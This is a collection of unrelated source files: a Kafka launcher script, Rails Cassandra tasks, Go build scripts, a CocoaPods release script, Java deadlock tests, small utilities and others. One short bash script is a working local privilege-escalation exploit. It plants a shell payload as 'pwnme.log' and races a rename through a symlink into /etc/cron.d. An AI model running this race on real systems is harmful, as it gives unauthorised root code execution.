CLASSPATH="/opt/kafka-$UPGRADE_KAFKA_STREAMS_TEST_VERSION/libs/zkclient-0.9.jar":"$CLASSPATH"
CLASSPATH="/opt/kafka-$UPGRADE_KAFKA_STREAMS_TEST_VERSION/libs/zookeeper-3.4.8.jar":"$CLASSPATH"
fi
fi
for file in "$streams_dependant_clients_lib_dir"/rocksdb*.jar;
do
CLASSPATH="$CLASSPATH":"$file"
done
for file in "$streams_dependant_clients_lib_dir"/*hamcrest*.jar;
do
CLASSPATH="$CLASSPATH":"$file"
done
for file in "$base_dir"/shell/build/libs/kafka-shell*.jar;
do
if should_include_file "$file"; then
CLASSPATH="$CLASSPATH":"$file"
fi
done
for dir in "$base_dir"/shell/build/dependant-libs-${SCALA_VERSION}*;
do
CLASSPATH="$CLASSPATH:$dir/*"
done
for file in "$base_dir"/tools/build/libs/kafka-tools*.jar;
do
if should_include_file "$file"; then
CLASSPATH="$CLASSPATH":"$file"
fi
done
for dir in "$base_dir"/tools/build/dependant-libs-${SCALA_VERSION}*;
do
CLASSPATH="$CLASSPATH:$dir/*"
done
for cc_pkg in "api" "transforms" "runtime" "file" "mirror" "mirror-client" "json" "tools" "basic-auth-extension"
do
for file in "$base_dir"/connect/${cc_pkg}/build/libs/connect-${cc_pkg}*.jar;
do
if should_include_file "$file"; then
CLASSPATH="$CLASSPATH":"$file"
fi
done
if [ -d "$base_dir/connect/${cc_pkg}/build/dependant-libs" ] ; then
CLASSPATH="$CLASSPATH:$base_dir/connect/${cc_pkg}/build/dependant-libs/*"
fi
done
# classpath addition for release
for file in "$base_dir"/libs/*;
do
if should_include_file "$file"; then
CLASSPATH="$CLASSPATH":"$file"
fi
done
for file in "$base_dir"/core/build/libs/kafka_${SCALA_BINARY_VERSION}*.jar;
do
if should_include_file "$file"; then
CLASSPATH="$CLASSPATH":"$file"
fi
done
shopt -u nullglob
if [ -z "$CLASSPATH" ] ; then
echo "Classpath is empty. Please build the project first e.g. by running './gradlew jar -PscalaVersion=$SCALA_VERSION'"
exit 1
fi
# JMX settings
if [ -z "$KAFKA_JMX_OPTS" ]; then
KAFKA_JMX_OPTS="-Dcom.sun.management.jmxremote -Dcom.sun.management.jmxremote.authenticate=false -Dcom.sun.management.jmxremote.ssl=false "
fi
# JMX port to use
if [ $JMX_PORT ]; then
KAFKA_JMX_OPTS="$KAFKA_JMX_OPTS -Dcom.sun.management.jmxremote.port=$JMX_PORT "
fi
# Log directory to use
if [ "x$LOG_DIR" = "x" ]; then
LOG_DIR="$base_dir/logs"
fi
# Log4j settings
if [ -z "$KAFKA_LOG4J_OPTS" ]; then
# Log to console. This is a tool.
LOG4J_DIR="$base_dir/config/tools-log4j.properties"
# If Cygwin is detected, LOG4J_DIR is converted to Windows format.
(( CYGWIN )) && LOG4J_DIR=$(cygpath --path --mixed "${LOG4J_DIR}")
KAFKA_LOG4J_OPTS="-Dlog4j.configuration=file:${LOG4J_DIR}"
else
# create logs directory
if [ ! -d "$LOG_DIR" ]; then
mkdir -p "$LOG_DIR"
fi
fi
# If Cygwin is detected, LOG_DIR is converted to Windows format.
(( CYGWIN )) && LOG_DIR=$(cygpath --path --mixed "${LOG_DIR}")
KAFKA_LOG4J_OPTS="-Dkafka.logs.dir=$LOG_DIR $KAFKA_LOG4J_OPTS"
# Generic jvm settings you want to add
if [ -z "$KAFKA_OPTS" ]; then
KAFKA_OPTS=""
fi
# Set Debug options if enabled
if [ "x$KAFKA_DEBUG" != "x" ]; then
# Use default ports
DEFAULT_JAVA_DEBUG_PORT="5005"
if [ -z "$JAVA_DEBUG_PORT" ]; then
JAVA_DEBUG_PORT="$DEFAULT_JAVA_DEBUG_PORT"
fi
# Use the defaults if JAVA_DEBUG_OPTS was not set
DEFAULT_JAVA_DEBUG_OPTS="-agentlib:jdwp=transport=dt_socket,server=y,suspend=${DEBUG_SUSPEND_FLAG:-n},address=$JAVA_DEBUG_PORT"
if [ -z "$JAVA_DEBUG_OPTS" ]; then
JAVA_DEBUG_OPTS="$DEFAULT_JAVA_DEBUG_OPTS"
fi
echo "Enabling Java debug options: $JAVA_DEBUG_OPTS"
KAFKA_OPTS="$JAVA_DEBUG_OPTS $KAFKA_OPTS"
fi
# Which java to use
if [ -z "$JAVA_HOME" ]; then
JAVA="java"
else
JAVA="$JAVA_HOME/bin/java"
fi
# Memory options
if [ -z "$KAFKA_HEAP_OPTS" ]; then
KAFKA_HEAP_OPTS="-Xmx256M"
fi
# JVM performance options
# MaxInlineLevel=15 is the default since JDK 14 and can be removed once older JDKs are no longer supported
if [ -z "$KAFKA_JVM_PERFORMANCE_OPTS" ]; then
KAFKA_JVM_PERFORMANCE_OPTS="-server -XX:+UseG1GC -XX:MaxGCPauseMillis=20 -XX:InitiatingHeapOccupancyPercent=35 -XX:+ExplicitGCInvokesConcurrent -XX:MaxInlineLevel=15 -Djava.awt.headless=true"
fi
while [ $# -gt 0 ]; do
COMMAND=$1
case $COMMAND in
-name)
DAEMON_NAME=$2
CONSOLE_OUTPUT_FILE=$LOG_DIR/$DAEMON_NAME.out
shift 2
;;
-loggc)
if [ -z "$KAFKA_GC_LOG_OPTS" ]; then
GC_LOG_ENABLED="true"
fi
shift
;;
-daemon)
DAEMON_MODE="true"
shift
;;
*)
break
;;
esac
done
# GC options
GC_FILE_SUFFIX='-gc.log'
GC_LOG_FILE_NAME=''
if [ "x$GC_LOG_ENABLED" = "xtrue" ]; then
GC_LOG_FILE_NAME=$DAEMON_NAME$GC_FILE_SUFFIX
# The first segment of the version number, which is '1' for releases before Java 9
# it then becomes '9', '10', ...
# Some examples of the first line of `java --version`:
# 8 -> java version "1.8.0_152"
# 9.0.4 -> java version "9.0.4"
# 10 -> java version "10" 2018-03-20
# 10.0.1 -> java version "10.0.1" 2018-04-17
# We need to match to the end of the line to prevent sed from printing the characters that do not match
JAVA_MAJOR_VERSION=$("$JAVA" -version 2>&1 | sed -E -n 's/.* version "([0-9]*).*$/\1/p')
if [[ "$JAVA_MAJOR_VERSION" -ge "9" ]] ; then
KAFKA_GC_LOG_OPTS="-Xlog:gc*:file=$LOG_DIR/$GC_LOG_FILE_NAME:time,tags:filecount=10,filesize=100M"
else
KAFKA_GC_LOG_OPTS="-Xloggc:$LOG_DIR/$GC_LOG_FILE_NAME -verbose:gc -XX:+PrintGCDetails -XX:+PrintGCDateStamps -XX:+PrintGCTimeStamps -XX:+UseGCLogFileRotation -XX:NumberOfGCLogFiles=10 -XX:GCLogFileSize=100M"
fi
fi
# Remove a possible colon prefix from the classpath (happens at lines like `CLASSPATH="$CLASSPATH:$file"` when CLASSPATH is blank)
# Syntax used on the right side is native Bash string manipulation; for more details see
# http://tldp.org/LDP/abs/html/string-manipulation.html, specifically the section titled "Substring Removal"
CLASSPATH=${CLASSPATH#:}
# If Cygwin is detected, classpath is converted to Windows format.
(( CYGWIN )) && CLASSPATH=$(cygpath --path --mixed "${CLASSPATH}")
# Launch mode
if [ "x$DAEMON_MODE" = "xtrue" ]; then
nohup "$JAVA" $KAFKA_HEAP_OPTS $KAFKA_JVM_PERFORMANCE_OPTS $KAFKA_GC_LOG_OPTS $KAFKA_JMX_OPTS $KAFKA_LOG4J_OPTS -cp "$CLASSPATH" $KAFKA_OPTS "$@" > "$CONSOLE_OUTPUT_FILE" 2>&1 < /dev/null &
else
exec "$JAVA" $KAFKA_HEAP_OPTS $KAFKA_JVM_PERFORMANCE_OPTS $KAFKA_GC_LOG_OPTS $KAFKA_JMX_OPTS $KAFKA_LOG4J_OPTS -cp "$CLASSPATH" $KAFKA_OPTS "$@"
fi
|
namespace :cequel do
namespace :keyspace do
desc 'Initialize Cassandra keyspace'
task :create => :environment do
Cequel::Record.connection.schema.create!
puts "Created keyspace #{Cequel::Record.connection.name}"
end
desc 'Drop Cassandra keyspace'
task :drop => :environment do
Cequel::Record.connection.schema.drop!
puts "Dropped keyspace #{Cequel::Record.connection.name}"
end
end
desc "Synchronize all models defined in `app/models' with Cassandra database schema"
task :migrate => :environment do
watch_stack = ActiveSupport::Dependencies::WatchStack.new
Dir.glob(Rails.root.join('app', 'models', '**', '*.rb')).each do |file|
watch_stack.watch_namespaces([Object])
require_dependency(file)
watch_stack.new_constants.each do |class_name|
clazz = class_name.constantize
if clazz.ancestors.include?(Cequel::Record)
clazz.synchronize_schema
puts "Synchronized schema for #{class_name}"
end
end
end
end
desc "Create keyspace and tables for all defined models"
task :init => %w(keyspace:create migrate)
end
|
/**
* Created by rkapoor on 01/06/15.
*/
'use strict';
module.exports = function uglify(grunt) {
// Load task
grunt.loadNpmTasks('grunt-contrib-uglify');
// Options
return {
travelPage : {
src: 'public/js/production/travelPage.js',
dest: 'public/js/production/travelPage.min.js'
},
homePage : {
src : 'public/js/production/homePage.js',
dest : 'public/js/production/homePage.min.js'
},
hotelsAndPlacesPage : {
src : 'public/js/production/hotelsAndPlacesPage.js',
dest : 'public/js/production/hotelsAndPlacesPage.min.js'
}
};
};
|
def validate_specimen_definition(specimen_definition):
fields = ["id", "type", "container", "additive"]
field_types = {
"id": str,
"type": str,
"container": str,
"additive": str
}
for field in fields:
if field not in specimen_definition:
raise ValueError(f"Missing field: {field}")
for field, expected_type in field_types.items():
if field in specimen_definition and not isinstance(specimen_definition[field], expected_type):
raise ValueError(f"Invalid data type for field {field}: expected {expected_type.__name__}")
return specimen_definition |
#!/bin/bash
echo "Building Linux x86"
env GOOS=linux GOARCH=386 go build -a -o bin/ucspm-linux-x86
echo "Building Linux amd64"
env GOOS=linux GOARCH=amd64 go build -a -o bin/ucspm-linux-amd64
echo "Building Mac amd64"
env GOOS=darwin GOARCH=amd64 go build -a -o bin/ucspm-mac
echo "Building Solaris amd64"
env GOOS=solaris GOARCH=amd64 go build -a -o bin/ucspm-solaris
echo "Building Windows x86"
env GOOS=windows GOARCH=386 go build -a -o bin/ucspm-windows-x86
echo "Building Windows amd64"
env GOOS=windows GOARCH=amd64 go build -a -o bin/ucspm-windows-amd64
echo "Building complete"
# android arm
# darwin 386
# darwin amd64
# darwin arm
# darwin arm64
# dragonfly amd64
# freebsd 386
# freebsd amd64
# freebsd arm
# linux 386
# linux amd64
# linux arm
# linux arm64
# linux ppc64
# linux ppc64le
# linux mips
# linux mipsle
# linux mips64
# linux mips64le
# netbsd 386
# netbsd amd64
# netbsd arm
# openbsd 386
# openbsd amd64
# openbsd arm
# plan9 386
# plan9 amd64
# solaris amd64
# windows 386
# windows amd64 |
import math
def calculate_adjusted_distance(coordinates):
"""
Generator function to calculate the adjusted distance for a given set of coordinates.
Args:
coordinates: A list of tuples representing the coordinates.
Yields:
float: The adjusted distance for each pair of coordinates.
"""
def distance(coord1, coord2):
return math.sqrt((coord2[0] - coord1[0])**2 + (coord2[1] - coord1[1])**2 + (coord2[2] - coord1[2])**2)
zsTop = max(coord[2] for coord in coordinates) # Find the top of the z-axis
for i in range(len(coordinates) - 1):
adjustedDist = distance(coordinates[i], coordinates[i+1]) + coordinates[i][2] # Calculate adjusted distance
yield adjustedDist |
'use strict'
const util = require('util')
const exec = util.promisify(require('child_process').exec)
const scan = require('scan-dir-recursive/sync')
module.exports.start = async () => {
// Purge data
await exec('npm run ddb:purge')
// Include all files for full covertage
scan(`${__dirname}/../src`).filter(file => file.endsWith('.js')).forEach(file => require(file))
}
|
<filename>net/pubsub/testing.go<gh_stars>0
package pubsub
import (
"context"
"sync"
"gx/ipfs/QmTu65MVbemtUxJEWgsTtzv9Zv9P8rvmqNA4eG9TrTRGYc/go-libp2p-peer"
)
// FakeMessage is a simple pubsub message
type FakeMessage struct {
peerID peer.ID
data []byte
}
// GetFrom returns the message's sender ID
func (m *FakeMessage) GetFrom() peer.ID {
return m.peerID
}
// GetData returns the message's payload
func (m *FakeMessage) GetData() []byte {
return m.data
}
// FakeSubscription is a fake pubsub subscription.
type FakeSubscription struct {
topic string
pending chan Message
err error
cancelled bool
awaitCancel sync.WaitGroup
}
// NewFakeSubscription builds a new fake subscription to a topic.
func NewFakeSubscription(topic string, bufSize int) *FakeSubscription {
sub := &FakeSubscription{
topic: topic,
pending: make(chan Message, bufSize),
awaitCancel: sync.WaitGroup{},
}
sub.awaitCancel.Add(1)
return sub
}
// Subscription interface
// Topic returns this subscription's topic.
func (s *FakeSubscription) Topic() string {
return s.topic
}
// Next returns the next messages from this subscription.
func (s *FakeSubscription) Next(ctx context.Context) (Message, error) {
if s.err != nil {
return nil, s.err
}
select {
case msg := <-s.pending:
return msg, nil
case <-ctx.Done():
return nil, ctx.Err()
}
}
// Cancel cancels this subscription, after which no subsequently posted messages will be received.
func (s *FakeSubscription) Cancel() {
if s.cancelled {
panic("subscription already cancelled")
}
s.cancelled = true
s.awaitCancel.Done()
}
// Manipulators
// Post posts a new message to this subscription.
func (s *FakeSubscription) Post(msg Message) {
if s.err != nil {
panic("subscription has failed")
}
if !s.cancelled {
s.pending <- msg
}
}
// Fail causes subsequent reads from this subscription to fail.
func (s *FakeSubscription) Fail(err error) {
if err != nil {
panic("error is nil")
}
if !s.cancelled {
s.err = err
}
}
// AwaitCancellation waits for the subscription to be canceled by the subscriber.
func (s *FakeSubscription) AwaitCancellation() {
s.awaitCancel.Wait()
}
|
<filename>src/index.js
import ThesaurusInput from './components/Input.jsx';
export default ThesaurusInput; |
#!/bin/sh
#
# Vivado(TM)
# runme.sh: a Vivado-generated Runs Script for UNIX
# Copyright 1986-2015 Xilinx, Inc. All Rights Reserved.
#
if [ -z "$PATH" ]; then
PATH=/home/huchao/vivado/SDK/2015.2/bin:/home/huchao/vivado/Vivado/2015.2/ids_lite/ISE/bin/lin64:/home/huchao/vivado/Vivado/2015.2/bin
else
PATH=/home/huchao/vivado/SDK/2015.2/bin:/home/huchao/vivado/Vivado/2015.2/ids_lite/ISE/bin/lin64:/home/huchao/vivado/Vivado/2015.2/bin:$PATH
fi
export PATH
if [ -z "$LD_LIBRARY_PATH" ]; then
LD_LIBRARY_PATH=/home/huchao/vivado/Vivado/2015.2/ids_lite/ISE/lib/lin64
else
LD_LIBRARY_PATH=/home/huchao/vivado/Vivado/2015.2/ids_lite/ISE/lib/lin64:$LD_LIBRARY_PATH
fi
export LD_LIBRARY_PATH
HD_PWD=`dirname "$0"`
cd "$HD_PWD"
HD_LOG=runme.log
/bin/touch $HD_LOG
ISEStep="./ISEWrap.sh"
EAStep()
{
$ISEStep $HD_LOG "$@" >> $HD_LOG 2>&1
if [ $? -ne 0 ]
then
exit
fi
}
EAStep vivado -log lab1_3_2.vds -m64 -mode batch -messageDb vivado.pb -notrace -source lab1_3_2.tcl
|
# for vast
touch .no_auto_tmux
# drop last line with PS1
mv .bashrc .bashrc.back
cat .bashrc.back | grep -vE '^PS1' > .bashrc
python -m deeppavlov.deep riseapi ner_rus_bert
|
class ApplicationEventHandler {
var eventHandlers: [String: () -> Void] = [:]
func handleResignActive() {
if let handler = eventHandlers["applicationWillResignActive"] {
handler()
}
}
func handleEnterBackground() {
if let handler = eventHandlers["applicationDidEnterBackground"] {
handler()
}
}
func handleEnterForeground() {
if let handler = eventHandlers["applicationWillEnterForeground"] {
handler()
}
}
func registerEvent(eventName: String, handler: @escaping () -> Void) {
eventHandlers[eventName] = handler
}
func triggerEvent(eventName: String) {
if let handler = eventHandlers[eventName] {
handler()
}
}
}
// Sample usage
let eventHandler = ApplicationEventHandler()
eventHandler.registerEvent(eventName: "applicationWillResignActive") {
print("Handling applicationWillResignActive event")
}
eventHandler.registerEvent(eventName: "applicationDidEnterBackground") {
print("Handling applicationDidEnterBackground event")
}
eventHandler.registerEvent(eventName: "applicationWillEnterForeground") {
print("Handling applicationWillEnterForeground event")
}
eventHandler.triggerEvent(eventName: "applicationWillResignActive")
eventHandler.triggerEvent(eventName: "applicationDidEnterBackground")
eventHandler.triggerEvent(eventName: "applicationWillEnterForeground") |
'use strict';
const MissingPermission = require('../missing-permission');
const { ADMIN } = require('../permissions');
module.exports = function(config, permission) {
if (!permission || !config.extendedPermissions) {
return (req, res, next) => next();
}
return (req, res, next) => {
if (
req.user &&
req.user.permissions &&
(req.user.permissions.indexOf(ADMIN) !== -1 ||
req.user.permissions.indexOf(permission) !== -1)
) {
return next();
}
return res
.status(403)
.json(
new MissingPermission({
permission,
message: `You require ${permission} to perform this action`,
})
)
.end();
};
};
|
# -*- coding: utf-8 -*-
miquire :core, "event"
# イベントの発生を待ち受けるオブジェクト
class EventListener
# プラグインコールバックをこれ以上実行しない。
def self.cancel!
throw :plugin_exit, false end
# ==== Args
# [event] 監視するEventのインスタンス
# [&callback] コールバック
def initialize(event, &callback)
type_strict event => Event, callback => :call
@event = event
@callback = callback
event.add_observer self
end
# イベントを実行する
# ==== Args
# [*args] イベントの引数
def update(*args)
@callback.call(*args, &EventListener.method(:cancel!)) end
# このリスナを削除する
# ==== Return
# self
def detach
count = @event.count_observers
@event.delete_observer(self)
self end
end
|
def print_fibonacci_sequence(n):
if n == 0:
print("The sequence cannot be printed as the given number of terms is 0.")
elif n == 1:
print("0")
else:
f1, f2 = 0, 1
print("0, 1", end='')
for i in range(2, n):
f3 = f1 + f2
print(',', f3, end='')
f1, f2 = f2, f3
print(".") |
#!/bin/bash
cd /tmp
mkdir log
ln -s /etc/cron.d link
cd log
echo -e '#!/bin/bash\necho test > /tmp/x' > pwnme.log
perl -e 'print "A"x1024' >> pwnme.log
chmod 755 pwnme.log
chmod 555 .
/tmp/rename /tmp/log /tmp/link &
for i in {1..100}; do
/home/user/run_cron
sleep 0.1
chmod u+w .
mv pwnme.log.1 pwnme.log 2>/dev/null
chmod u-w .
if [ ! -f pwnme.log ]; then
break;
fi
done
|
#!/bin/sh
REMOTE_BRANCH=master
POD_NAME=PactConsumerSwift
PODSPEC=PactConsumerSwift.podspec
RELEASE_NOTES=CHANGELOG.md
POD=${COCOAPODS:-"pod"}
function help {
echo "Usage: release VERSION RELEASE_NAME DRY_RUN"
echo
echo "VERSION should be the version to release, should not include the 'v' prefix"
echo "RELEASE_NAME should be the type of release 'Bugfix Release / Maintenance Release'"
echo
echo "FLAGS"
echo " -d Dry run, won't push anything or publish cocoapods"
echo
echo " Example: ./scripts/release.sh 1.0.0 'Bugfix Release'"
echo
exit 2
}
function die {
echo "[ERROR] $@"
echo
exit 1
}
if [ $# -lt 2 ]; then
help
fi
VERSION=$1
RELEASE_NAME=$2
DRY_RUN=$3
VERSION_TAG="v$VERSION"
echo "-> Verifying Local Directory for Release"
if [ -z "`which $POD`" ]; then
die "Cocoapods is required to produce a release. Aborting."
fi
echo " > Cocoapods is installed"
echo " > Is this a reasonable tag?"
echo $VERSION_TAG | grep -q "^vv"
if [ $? -eq 0 ]; then
die "This tag ($VERSION) is an incorrect format. You should remove the 'v' prefix."
fi
echo $VERSION_TAG | grep -q -E "^v\d+\.\d+\.\d+(-\w+(\.\d)?)?\$"
if [ $? -ne 0 ]; then
die "This tag ($VERSION) is an incorrect format. It should be in 'v{MAJOR}.{MINOR}.{PATCH}(-{PRERELEASE_NAME}.{PRERELEASE_VERSION})' form."
fi
echo " > Is this version ($VERSION) unique?"
git describe --exact-match "$VERSION_TAG" > /dev/null 2>&1
if [ $? -eq 0 ]; then
die "This tag ($VERSION) already exists. Aborting."
else
echo " > Yes, tag is unique"
fi
echo " > Generating release notes to $RELEASE_NOTES"
cp $RELEASE_NOTES ${RELEASE_NOTES}.backup
echo "# ${VERSION} - ${RELEASE_NAME}\n" > ${RELEASE_NOTES}.next
LATEST_TAG=`git describe --abbrev=0 --tags --match=v[0-9].[0-9].[0-9]`
git log --pretty='* %h - %s (%an, %ad)' ${LATEST_TAG}..HEAD . >> ${RELEASE_NOTES}.next
cat $RELEASE_NOTES.next | cat - ${RELEASE_NOTES}.backup > ${RELEASE_NOTES}
rm ${RELEASE_NOTES}.next
rm ${RELEASE_NOTES}.backup
git add $RELEASE_NOTES || { die "Failed to add ${RELEASE_NOTES} to INDEX"; }
if [ ! -f "$PODSPEC" ]; then
die "Cannot find podspec: $PODSPEC. Aborting."
fi
echo " > Podspec exists"
# Verify cocoapods trunk ownership
pod trunk me | grep -q "$POD_NAME" || die "You do not have access to pod repository $POD_NAME. Aborting."
echo " > Verified ownership to $POD_NAME pod"
echo "--- Releasing version $VERSION (tag: $VERSION_TAG)..."
function restore_podspec {
if [ -f "${PODSPEC}.backup" ]; then
mv -f ${PODSPEC}{.backup,}
fi
}
echo "-> Ensuring no differences to origin/$REMOTE_BRANCH"
git fetch origin || die "Failed to fetch origin"
git diff --quiet HEAD "origin/$REMOTE_BRANCH" || die "HEAD is not aligned to origin/$REMOTE_BRANCH. Cannot update version safely"
echo "-> Setting podspec version"
cat "$PODSPEC" | grep 's.version' | grep -q "\"$VERSION\""
SET_PODSPEC_VERSION=$?
if [ $SET_PODSPEC_VERSION -eq 0 ]; then
echo " > Podspec already set to $VERSION. Skipping."
else
sed -i.backup "s/s.version *= *\".*\"/s.version = \"$VERSION\"/g" "$PODSPEC" || {
restore_podspec
die "Failed to update version in podspec"
}
git add ${PODSPEC} || { restore_podspec; die "Failed to add ${PODSPEC} to INDEX"; }
git commit -m "chore: Bumping version to $VERSION" || { restore_podspec; die "Failed to push updated version: $VERSION"; }
fi
echo "-> Tagging version"
git tag "$VERSION_TAG" -F "$RELEASE_NOTES" || die "Failed to tag version"
if [ -z "$DRY_RUN" ]; then
echo "-> Pushing tag to origin"
git push origin "$VERSION_TAG" || die "Failed to push tag '$VERSION_TAG' to origin"
if [ $SET_PODSPEC_VERSION -ne 0 ]; then
git push origin "$REMOTE_BRANCH" || die "Failed to push to origin"
echo " > Pushed version to origin"
fi
echo
echo "---------------- Released as $VERSION_TAG ----------------"
echo
echo
echo "Pushing to pod trunk..."
$POD trunk push "$PODSPEC" --allow-warnings
else
echo "-> Dry run specified, skipping push of new version"
$POD spec lint "$PODSPEC" --allow-warnings
fi
rm ${PODSPEC}.backup |
<filename>src-ts/7.2.ts
import * as fs from "fs";
import * as rd from "readline";
import * as path from "path";
var filenPath1 = path.join(__dirname, "..", "text-assets", "7.1.mine.txt");
console.log(`filenPath1: ${filenPath1}`);
var reader1 = rd.createInterface(fs.createReadStream(filenPath1));
var crabs: Array<number> = [];
reader1.on("line", (l: string) => {
// console.log(`l: ${l} `);
const tokens = l.split(",");
tokens.forEach((x) => {
crabs.push(parseInt(x));
});
});
reader1.on("close", () => {
console.log(`Data has been read ${crabs.length}`);
let sortedcrabs: number[] = crabs.sort((n1, n2) => n1 - n2);
// console.log(sortedcrabs);
let p = 0;
if (sortedcrabs.length % 2) {
p = (sortedcrabs.length + 1) / 2;
} else {
p = sortedcrabs.length / 2;
}
let median = (sortedcrabs[p - 1] + sortedcrabs[p]) / 2;
let total = sortedcrabs.reduce((x, y) => x + y, 0);
let mean = Math.round(total / sortedcrabs.length);
console.log(`sortedcrabs.length: ${sortedcrabs.length} p: ${p}`);
console.log(
`sortedcrabs[p-1]: ${sortedcrabs[p - 1]}
sortedcrabs[p]: ${sortedcrabs[p]}
median: ${median} mean: ${mean} `
);
let leastfuel = Infinity;
let location = 0;
let start = mean < median ? mean : median;
let end = mean > median ? mean : median;
for (let i = start - 1; i < end + 2; i++) {
let fuel = 0;
for (let j = 0; j < sortedcrabs.length; j++) {
let distance = Math.abs(sortedcrabs[j] - i);
//sum of 1 to n = (n * (n+1)) / 2;
fuel += (distance * (distance + 1)) / 2;
}
// console.log(` location: ${i} answer: ${fuel} `);
if (fuel < leastfuel) {
leastfuel = fuel;
location = i;
}
}
// console.log(crabs);
console.log(`location: ${location} answer: ${leastfuel} `);
// 98905974 too high
});
|
package com.atjl.util.thread;
import com.atjl.util.collection.CollectionUtil;
import com.atjl.util.common.SystemUtil;
import com.atjl.util.thread.task.BaseTask;
import org.junit.Test;
import java.util.concurrent.CountDownLatch;
import java.util.concurrent.locks.ReentrantLock;
public class LockTest {
@Test
public void testCountDown() {
String pool = "P1";
ThreadPoolManager.init(CollectionUtil.newList(pool + ThreadConstant.IO_POOL_PARAM));
CountDownLatch c = new CountDownLatch(10);
ThreadPoolManager.execute(pool, new BaseTask() {
@Override
protected void bizRun() {
c.countDown();
}
});
ThreadPoolManager.execute(pool, new BaseTask() {
@Override
protected void bizRun() {
try {
c.await();
} catch (InterruptedException e) {
e.printStackTrace();
}
}
});
try {
c.await();
} catch (InterruptedException e) {
e.printStackTrace();
}
}
/**
* synchronized dead lock
*/
public static final String A = "A";
public static final String B = "B";
public static final String C = "C";
@Test
public void testSyncDeadLock() {
String pool = "P1";
ThreadPoolManager.init(CollectionUtil.newList(pool + ThreadConstant.IO_POOL_PARAM));
CountDownLatch c = new CountDownLatch(2);
ThreadPoolManager.execute(pool, new BaseTask() {
@Override
protected void bizRun() {
c.countDown();
try {
c.await();
} catch (InterruptedException e) {
e.printStackTrace();
}
synchronized (A) {
SystemUtil.sleep(1000);
synchronized (B) {
synchronized (C) {
System.out.println("get A,B");
}
}
}
}
});
ThreadPoolManager.execute(pool, new BaseTask() {
@Override
protected void bizRun() {
c.countDown();
try {
c.await();
} catch (InterruptedException e) {
e.printStackTrace();
}
synchronized (C) {
SystemUtil.sleep(1000);
synchronized (B) {
synchronized (A) {
System.out.println("get B,A");
}
}
}
}
});
SystemUtil.sleepForever();
System.out.println("end");
}
/**
* ReentrantLock dead lock
*/
@Test
public void testDeadLock() {
ReentrantLock l1 = new ReentrantLock();
ReentrantLock l2 = new ReentrantLock();
String pool = "P1";
ThreadPoolManager.init(CollectionUtil.newList(pool + ThreadConstant.IO_POOL_PARAM));
CountDownLatch c = new CountDownLatch(2);
ThreadPoolManager.execute(pool, new BaseTask() {
@Override
protected void bizRun() {
c.countDown();
try {
c.await();
} catch (InterruptedException e) {
e.printStackTrace();
}
l1.lock();
SystemUtil.sleep(1000);
l2.lock();
System.out.println("get A,B");
l2.unlock();
l1.unlock();
}
});
ThreadPoolManager.execute(pool, new BaseTask() {
@Override
protected void bizRun() {
c.countDown();
try {
c.await();
} catch (InterruptedException e) {
e.printStackTrace();
}
l2.lock();
SystemUtil.sleep(1000);
l1.lock();
System.out.println("get B,A");
l1.unlock();
l2.unlock();
}
});
SystemUtil.sleepForever();
System.out.println("end");
}
}
|
/**
* fixed tag for weex
* @author vfasky<<EMAIL>>
*
**/
'use strict'
import { clear } from './reg'
import component from './fixed'
declare var require
export default {
install(Vue) {
Vue.fixedClear = function() {
clear()
}
let fixed
if (String(weex.config.env.platform).toLowerCase() == 'web'){
fixed = require('../dist/weex-vue-fixed.js')
} else {
fixed = require('../dist/weex-weex-fixed.js')
}
component.render = fixed.render
Vue.component('wv-fixed', component)
}
} |
def isAnagram(str1, str2):
# Remove all white spaces and convert strings into lowercase.
str1 = str1.replace(" ", "").lower()
str2 = str2.replace(" ", "").lower()
# Check if two strings have the same length.
if len(str1) != len(str2):
return False
# Create a dictionary and count the frequency of each character of the first string.
count = {}
for c in str1:
if c in count:
count[c] += 1
else:
count[c] = 1
# Check if the characters of the second string are present in the frequency dictionary of the first string and in the same number.
for c in str2:
if c in count:
count[c] -= 1
else:
return False
# Check if all characters had the same frequency in both strings.
for k in count:
if count[k] != 0:
return False
return True
# Test
str1 = 'abc'
str2 = 'cab'
print(isAnagram(str1, str2)) # Output: True |
#! /bin/bash
. /opt/conda/etc/profile.d/conda.sh
conda activate pydm
cd $(dirname $0)
echo "PyDM .ui files dir": $(pwd)
for motor in '{"MOTOR": "XF:12IDC-ES:2{WAXS:1-Ax:Arc}Mtr"}' \
'{"MOTOR": "XF:12IDC-OP:2{HEX:PRS-Ax:Rot}Mtr"}'; do
echo "Starting $motor..."
pydm --hide-nav-bar -m "$motor" inline_motor.ui > /dev/null 2>&1 &
done
|
function countUniqueHTMLTags(htmlString) {
const tagSet = new Set();
let tag = '';
let inTag = false;
for (let i = 0; i < htmlString.length; i++) {
if (htmlString[i] === '<') {
inTag = true;
tag = '<';
} else if (htmlString[i] === '>') {
inTag = false;
tag += '>';
tagSet.add(tag);
tag = '';
} else if (inTag) {
tag += htmlString[i];
}
}
return tagSet.size;
} |
const Overtimer = require('./../../src/overtimer')
console.log('Starting timer...')
const t = new Overtimer(3000, {poll: 100, delay: 1000, debug: true, repeat: 10, start: false})
t.on('poll', function() {
process.stdout.write("\u001b[0J\u001b[1J\u001b[2J\u001b[0;0H\u001b[0;0W")
console.log(`Current Repeat Percent: ${t.currentRepeatPercent.toFixed(2)}`)
console.log(`Current Repeat Percent With Delay: ${t.currentRepeatPercentWithDelay.toFixed(2)}`)
console.log(`Total Percent: ${t.totalPercent.toFixed(2)}`)
console.log(`Total Percent With Delay: ${t.totalPercentWithDelay.toFixed(2)}`)
})
t.start()
|
<reponame>vadi2/codeql
public class Person
{
private String title;
private String forename;
private String surname;
// ...
public int hashcode() { // The method is named 'hashcode'.
int hash = 23 * title.hashCode();
hash ^= 13 * forename.hashCode();
return hash ^ surname.hashCode();
}
} |
#!/bin/bash
docker build -t diegopacheco/mysql57binlog:v1 . --no-cache
|
#!/bin/sh
set -e
echo "y" | android update sdk --no-ui --filter platform-tools,tools
echo "y" | android update sdk --no-ui --filter build-tools-20.0.0
echo "y" | android update sdk --no-ui --filter android-18
echo "y" | android update sdk --no-ui --filter addon-google_apis-google-18,extra-android-support
git clone --depth 1 https://github.com/mosabua/maven-android-sdk-deployer.git
cd maven-android-sdk-deployer
mvn install -P 4.3
cd -
rm -rf maven-android-sdk-deployer
jarLocation="$ANDROID_HOME/extras/android/m2repository/com/android/support/support-v4/19.0.1/support-v4-19.0.1.jar"
if [ ! -f "$jarLocation" ]; then
jarLocation="$ANDROID_HOME/extras/android/support/v4/android-support-v4.jar"
if [ ! -f "$jarLocation" ]; then
echo "support-v4 artifact not found!";
exit 1;
fi
fi
echo "Installing com.android.support:support-v4 from $jarLocation"
